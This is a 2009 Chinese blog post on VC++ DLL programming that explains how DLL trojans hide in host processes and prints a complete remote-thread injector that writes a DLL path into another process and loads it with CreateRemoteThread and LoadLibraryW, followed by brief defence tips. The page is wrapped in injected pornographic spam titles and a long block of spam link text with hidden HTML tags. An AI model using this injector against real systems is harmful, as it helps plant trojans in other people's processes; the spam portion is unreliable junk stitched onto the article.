青青草原综合久久大伊人导航_色综合久久天天综合_日日噜噜夜夜狠狠久久丁香五月_热久久这里只有精品

VC++動態鏈接庫編程之DLL木馬

從前文可知,DLL在程序編制中可作出巨大貢獻,它提供了具共性代碼的復用能力。但是,正如一門高深的武學,若被掌握在正義之俠的手上,便可助其仗義江湖;但若被掌握在邪惡之徒的手上,則必然在江湖上掀起腥風血雨。DLL正是一種這樣的武學。DLL一旦染上了魔性,就不再是正常的DLL程序,而是DLL木馬,一種惡貫滿盈的病毒,令特洛伊一夜之間國破家亡。

  DLL木馬的原理

  DLL木馬的實現原理是編程者在DLL中包含木馬程序代碼,隨后在目標主機中選擇特定目標進程,以某種方式強行指定該進程調用包含木馬程序的DLL,最終達到侵襲目標系統的目的。

  正是DLL程序自身的特點決定了以這種形式加載木馬不僅可行,而且具有良好的隱藏性:

 ?。?)DLL程序被映射到宿主進程的地址空間中,它能夠共享宿主進程的資源,并根據宿主進程在目標主機的級別非法訪問相應的系統資源;

 ?。?)DLL程序沒有獨立的進程地址空間,從而可以避免在目標主機中留下"蛛絲馬跡",達到隱蔽自身的目的。

  DLL木馬實現了"真隱藏",我們在任務管理器中看不到木馬"進程",它完全溶進了系統的內核。與"真隱藏"對應的是"假隱藏","假隱藏"木馬把自己注冊成為一個服務。雖然在任務管理器中也看不到這個進程,但是"假隱藏"木馬本質上還具備獨立的進程空間。"假隱藏"只適用于Windows9x的系統,對于基于WINNT的操作系統,通過服務管理器,我們可以發現系統中注冊過的服務。

  DLL木馬注入其它進程的方法為遠程線程插入。

  遠程線程插入技術指的是通過在另一個進程中創建遠程線程的方法進入那個進程的內存地址空間。將木馬程序以DLL的形式實現后,需要使用插入到目標進程中的遠程線程將該木馬DLL插入到目標進程的地址空間,即利用該線程通過調用Windows API LoadLibrary函數來加載木馬DLL,從而實現木馬對系統的侵害。

  DLL木馬注入程序

  這里涉及到一個非常重要的Windows API――CreateRemoteThread。與之相比,我們所習慣使用的CreateThread API函數只能在進程自身內部產生一個新的線程,而且被創建的新線程與主線程共享地址空間和其他資源。而CreateRemoteThread則不同,它可以在另外的進程中產生線程!CreateRemoteThread有如下特點:

 ?。?)CreateRemoteThread較CreateThread多一個參數hProcess,該參數用于指定要創建線程的遠程進程,其函數原型為:

HANDLE CreateRemoteThread(
 HANDLE hProcess, //遠程進程句柄
 LPSECURITY_ATTRIBUTES lpThreadAttributes,
 SIZE_T dwStackSize,
 LPTHREAD_START_ROUTINE lpStartAddress,
 LPVOID lpParameter,
 DWORD dwCreationFlags,
 LPDWORD lpThreadId
);

 ?。?)線程函數的代碼不能位于我們用來注入DLL木馬的進程所在的地址空間中。也就是說,我們不能想當然地自己寫一個函數,并把這個函數作為遠程線程的入口函數;

 ?。?)不能把本進程的指針作為CreateRemoteThread的參數,因為本進程的內存空間與遠程進程的不一樣。
以下程序由作者Shotgun的DLL木馬注入程序簡化而得(單擊此處下載,在經典書籍《Windows核心編程》中我們也可以看到類似的例子),它將d盤根目錄下的troydll.dll插入到ID為4000的進程中:

#include <windows.h>
#include <stdlib.h>
#include <stdio.h>

void CheckError ( int, int, char *); //出錯處理函數

PDWORD pdwThreadId;
HANDLE hRemoteThread, hRemoteProcess;
DWORD fdwCreate, dwStackSize, dwRemoteProcessId;
PWSTR pszLibFileRemote=NULL;

void main(int argc,char **argv)
{
 int iReturnCode;
 char lpDllFullPathName[MAX_PATH];
 WCHAR pszLibFileName[MAX_PATH]={0};

 dwRemoteProcessId = 4000;
 strcpy(lpDllFullPathName, "d:\\troydll.dll");
 //將DLL文件全路徑的ANSI碼轉換成UNICODE碼
 iReturnCode = MultiByteToWideChar(CP_ACP, MB_ERR_INVALID_CHARS,
  lpDllFullPathName, strlen(lpDllFullPathName),
  pszLibFileName, MAX_PATH);
 CheckError(iReturnCode, 0, "MultByteToWideChar");
 //打開遠程進程
 hRemoteProcess = OpenProcess(PROCESS_CREATE_THREAD | //允許創建線程
  PROCESS_VM_OPERATION | //允許VM操作
  PROCESS_VM_WRITE, //允許VM寫
  FALSE, dwRemoteProcessId );
 CheckError( (int) hRemoteProcess, NULL, "Remote Process not Exist or Access Denied!");
 //計算DLL路徑名需要的內存空間
 int cb = (1 + lstrlenW(pszLibFileName)) * sizeof(WCHAR);
 pszLibFileRemote = (PWSTR) VirtualAllocEx( hRemoteProcess, NULL, cb, MEM_COMMIT, PAGE_READWRITE);
 CheckError((int)pszLibFileRemote, NULL, "VirtualAllocEx");
 //將DLL的路徑名復制到遠程進程的內存空間
 iReturnCode = WriteProcessMemory(hRemoteProcess, pszLibFileRemote, (PVOID) pszLibFileName, cb, NULL);
 CheckError(iReturnCode, false, "WriteProcessMemory");
 //計算LoadLibraryW的入口地址
 PTHREAD_START_ROUTINE pfnStartAddr = (PTHREAD_START_ROUTINE)
   GetProcAddress(GetModuleHandle(TEXT("Kernel32")), "LoadLibraryW");
 CheckError((int)pfnStartAddr, NULL, "GetProcAddress");
 //啟動遠程線程,通過遠程線程調用用戶的DLL文件
 hRemoteThread = CreateRemoteThread( hRemoteProcess, NULL, 0, pfnStartAddr, pszLibFileRemote, 0, NULL);
 CheckError((int)hRemoteThread, NULL, "Create Remote Thread");
 //等待遠程線程退出
 WaitForSingleObject(hRemoteThread, INFINITE);
 //清場處理
 if (pszLibFileRemote != NULL)
 {
  VirtualFreeEx(hRemoteProcess, pszLibFileRemote, 0, MEM_RELEASE);
 }
 if (hRemoteThread != NULL)
 {
  CloseHandle(hRemoteThread );
 }
 if (hRemoteProcess!= NULL)
 {
  CloseHandle(hRemoteProcess);
 }
}

//錯誤處理函數CheckError()
void CheckError(int iReturnCode, int iErrorCode, char *pErrorMsg)
{
 if(iReturnCode==iErrorCode)
 {
  printf("%s Error:%d\n\n", pErrorMsg, GetLastError());
  //清場處理
  if (pszLibFileRemote != NULL)
  {
   VirtualFreeEx(hRemoteProcess, pszLibFileRemote, 0, MEM_RELEASE);
  }
  if (hRemoteThread != NULL)
  {
   CloseHandle(hRemoteThread );
  }
  if (hRemoteProcess!= NULL)
  {
   CloseHandle(hRemoteProcess);
  }
  exit(0);
 }
}

  從DLL木馬注入程序的源代碼中我們可以分析出DLL木馬注入的一般步驟為:

  (1)取得宿主進程(即要注入木馬的進程)的進程ID dwRemoteProcessId;

 ?。?)取得DLL的完全路徑,并將其轉換為寬字符模式pszLibFileName;

 ?。?)利用Windows API OpenProcess打開宿主進程,應該開啟下列選項:

  a.PROCESS_CREATE_THREAD:允許在宿主進程中創建線程;

  b.PROCESS_VM_OPERATION:允許對宿主進程中進行VM操作;

  c.PROCESS_VM_WRITE:允許對宿主進程進行VM寫。

  (4)利用Windows API VirtualAllocEx函數在遠程線程的VM中分配DLL完整路徑寬字符所需的存儲空間,并利用Windows API WriteProcessMemory函數將完整路徑寫入該存儲空間;

 ?。?)利用Windows API GetProcAddress取得Kernel32模塊中LoadLibraryW函數的地址,這個函數將作為隨后將啟動的遠程線程的入口函數;

  (6)利用Windows API CreateRemoteThread啟動遠程線程,將LoadLibraryW的地址作為遠程線程的入口函數地址,將宿主進程里被分配空間中存儲的完整DLL路徑作為線程入口函數的參數以另其啟動指定的DLL;

 ?。?)清理現場。

  DLL木馬的防治

  從DLL木馬的原理和一個簡單的DLL木馬程序中我們學到了DLL木馬的工作方式,這可以幫助我們更好地理解DLL木馬病毒的防治手段。

  一般的木馬被植入后要打開一網絡端口與攻擊程序通信,所以防火墻是抵御木馬攻擊的最好方法。防火墻可以進行數據包過濾檢查,我們可以讓防火墻對通訊端口進行限制,只允許系統接受幾個特定端口的數據請求。這樣,即使木馬植入成功,攻擊者也無法進入到受侵系統,防火墻把攻擊者和木馬分隔開來了。

  對于DLL木馬,一種簡單的觀察方法也許可以幫助用戶發現之。我們查看運行進程所依賴的DLL,如果其中有一些莫名其妙的DLL,則可以斷言這個進程是宿主進程,系統被植入了DLL木馬。"道高一尺,魔高一丈",現如今,DLL木馬也發展到了更高的境界,它們看起來也不再"莫名其妙"。在最新的一些木馬里面,開始采用了先進的DLL陷阱技術,編程者用特洛伊DLL替換已知的系統DLL。特洛伊DLL對所有的函數調用進行過濾,對于正常的調用,使用函數轉發器直接轉發給被替換的系統DLL;對于一些事先約定好的特殊情況,DLL會執行一些相應的操作。

  本文給出的只是DLL木馬最簡單情況的介紹,讀者若有興趣深入研究,可以參考其它資料。

posted on 2009-06-09 21:21 wrh 閱讀(267) 評論(0)  編輯 收藏 引用


只有注冊用戶登錄后才能發表評論。
網站導航: 博客園   IT新聞   BlogJava   博問   Chat2DB   管理


導航

<2009年6月>
31123456
78910111213
14151617181920
21222324252627
2829301234
567891011

統計

常用鏈接

留言簿(19)

隨筆檔案

文章檔案

收藏夾

搜索

最新評論

閱讀排行榜

評論排行榜

青青草原综合久久大伊人导航_色综合久久天天综合_日日噜噜夜夜狠狠久久丁香五月_热久久这里只有精品
  • <ins id="pjuwb"></ins>
    <blockquote id="pjuwb"><pre id="pjuwb"></pre></blockquote>
    <noscript id="pjuwb"></noscript>
          <sup id="pjuwb"><pre id="pjuwb"></pre></sup>
            <dd id="pjuwb"></dd>
            <abbr id="pjuwb"></abbr>
            欧美日韩国产一级片| 国产精品素人视频| 亚洲国产高清在线| 久久一二三区| 欧美88av| 亚洲精品久久久蜜桃| 亚洲精品一区二区三区樱花| 亚洲破处大片| 日韩视频在线观看| 亚洲无限乱码一二三四麻| 中文亚洲免费| 欧美一区二区三区四区在线观看| 亚洲自拍三区| 久久久7777| 欧美黑人多人双交| 国产女同一区二区| 亚洲精品视频在线| 亚洲欧美综合另类中字| 免费黄网站欧美| 一区二区三区日韩欧美精品| 久久国产日韩| 欧美另类69精品久久久久9999| 国产精品草莓在线免费观看| 伊人色综合久久天天| 在线亚洲电影| 蜜臀av性久久久久蜜臀aⅴ| 亚洲激情啪啪| 久久精品国产欧美激情| 欧美日韩一区视频| 在线观看亚洲| 欧美一区二区三区在线看| 欧美激情1区2区| 欧美一二三区在线观看| 欧美日韩国产成人在线| 精品69视频一区二区三区| 亚洲一区二区三区色| 欧美高潮视频| 久久精品一区二区三区中文字幕| 欧美日韩中文另类| 亚洲精品午夜精品| 美女视频黄免费的久久| 亚洲一区二区三区免费视频| 欧美国产精品劲爆| 亚洲国产另类久久精品| 久久精品国产视频| 在线视频亚洲| 欧美日韩成人综合天天影院| 18成人免费观看视频| 久久国产日韩欧美| 亚洲自拍另类| 欧美婷婷六月丁香综合色| 亚洲精品五月天| 女同一区二区| 久久免费视频在线| 伊人成人在线视频| 久久亚洲一区| 久久精品免费| 一本久道久久综合狠狠爱| 蜜臀久久久99精品久久久久久| 亚洲一区二区伦理| 欧美视频中文字幕| avtt综合网| 亚洲高清中文字幕| 久热精品视频在线观看| 经典三级久久| 欧美成人a∨高清免费观看| 久久国产精品毛片| 欧美成人在线免费观看| 久久久久久穴| 一区精品在线| 免费黄网站欧美| 免费观看成人网| 亚洲毛片一区二区| 99精品欧美| 国产精品永久免费在线| 欧美专区第一页| 久久久久88色偷偷免费| 亚洲国产老妈| 亚洲精品偷拍| 国产精品久久久久影院色老大| 亚洲一区二区精品在线观看| 亚洲一线二线三线久久久| 国产视频一区欧美| 免费成人黄色片| 欧美理论在线| 久久国产视频网站| 久久人人97超碰国产公开结果| 亚洲精品久久久久久久久久久 | 午夜在线播放视频欧美| 久久大逼视频| 亚洲激情二区| 在线视频一区观看| 国产一区91| 亚洲电影自拍| 国产欧美日韩视频在线观看 | 亚洲一区二区三区在线| 国产一区二区三区日韩| 亚洲国产成人在线播放| 国产精品草莓在线免费观看| 久久久久久一区| 欧美日韩1区2区| 久久久久久久久岛国免费| 欧美激情影院| 久久久青草青青国产亚洲免观| 美乳少妇欧美精品| 欧美一区二区性| 欧美黄色一区| 麻豆精品一区二区综合av | 亚洲伊人观看| 一区二区三区成人精品| 久久精品五月婷婷| 亚洲免费网址| 欧美黄色小视频| 久久夜色精品国产亚洲aⅴ| 欧美系列精品| 久久久久久尹人网香蕉| 久久精品国产99国产精品| 狂野欧美一区| 久久久久国产一区二区| 欧美性大战久久久久久久| 亚洲大胆人体视频| 国产一区二区三区自拍| 午夜精品亚洲| 欧美成人激情视频免费观看| 欧美日韩国产va另类| 久久欧美中文字幕| 国产精品久久久久久亚洲调教| 亚洲国产你懂的| 在线播放视频一区| 欧美一级午夜免费电影| 性刺激综合网| 国产精品九九| 亚洲少妇中出一区| 亚洲午夜一区| 欧美日韩国产三区| 亚洲日本理论电影| 日韩视频在线免费| 欧美精品三级在线观看| 91久久一区二区| 日韩一级成人av| 欧美肉体xxxx裸体137大胆| 亚洲毛片av在线| 一区二区三区蜜桃网| 欧美日韩精品一区二区三区| 亚洲精品乱码久久久久久蜜桃91 | 国产三级欧美三级日产三级99| 亚洲一区二区三区色| 欧美怡红院视频| 国产自产2019最新不卡| 亚洲人成在线观看网站高清| 亚洲高清av在线| 亚洲淫片在线视频| 亚洲国产成人在线播放| 久久久久久亚洲精品中文字幕| 久久精品一区四区| 韩日精品视频一区| 久久成人免费| 老司机精品久久| 亚洲欧洲综合另类| 欧美在线视频二区| 国产精品视频一| 久久精品国产精品亚洲| 欧美电影美腿模特1979在线看| 亚洲国产精品成人久久综合一区 | 夜夜嗨av色一区二区不卡| 亚洲午夜精品国产| 麻豆国产精品va在线观看不卡| 亚洲欧洲精品一区二区| 裸体丰满少妇做受久久99精品| 麻豆精品一区二区av白丝在线| 黑人中文字幕一区二区三区| 久久综合综合久久综合| 亚洲日本无吗高清不卡| 午夜欧美大片免费观看| 韩国三级电影一区二区| 亚洲免费影视第一页| 免费看av成人| 裸体女人亚洲精品一区| 正在播放欧美一区| 国产午夜精品一区理论片飘花 | 国产精品初高中精品久久| 欧美一区二区三区免费观看| 欧美好吊妞视频| 欧美一区二区性| 一区二区三区高清在线观看| 国内精品久久久久影院优| 欧美日韩国产一级| 老司机成人网| 欧美一二三区精品| 99精品视频免费观看| 欧美黄色视屏| 久久一区二区三区av| 亚洲综合精品四区| 日韩视频在线一区二区三区| 国产一区二区三区精品欧美日韩一区二区三区 | 国产精品久久久久久久久果冻传媒 | 午夜精品久久久久久久蜜桃app| 在线观看视频免费一区二区三区| 欧美午夜久久| 欧美精品久久久久久|